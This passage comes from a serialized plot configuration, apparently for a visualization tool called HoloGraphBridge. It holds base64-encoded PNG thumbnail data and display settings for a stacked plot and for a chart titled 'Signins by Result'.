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', 'Title': 'Signins by Result', 'TitleSize': 1, 'TransitionIndex': 0}, {'$type': 'HoloGraphBridge.Plots.LinearStackPlot, HoloGraphBridge', 'AxesDivisions': [15, 5, 92], 'AxesDivisionsAuto': [False, False, False], 'AxesEdgesShow': [True, True, True], 'AxesGridlinesShow': [True, True, True], 'AxesLabelsOrientation': [1, 1, 1], 'AxesLabelsShow': [True, True, True], 'AxesLabelsSize': [0.09, 0.39, 0.19], 'AxesTicksShow': [False, False, False], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [2, -1, 20], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 12.4, 1], 'StackBuckets': [127, 0, 8], 'StackBucketsAuto': [False, True, True], 'StackBucketsFill': [False, False, False], 'StackGroup': False, 'StackOrderAuto': True, 'StackOrderIndex': 42, 'StackOrderReverse': False, 'StackRescale': False, 'StackSpacing': [0, 1, 0], 'StackSpacingAuto': [False, False, False], 'StackSumIndex': -1, 'StackWidth': [1, 1, 35], 'StackWidthAuto': [False, False, True], 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 35, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [-0.24890677630901337, -0.5708568692207336, -0.16457542777061462, 0.7649081945419312], 'ModelScale': 4, 'ModelTranslation': [0, 0, 0], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,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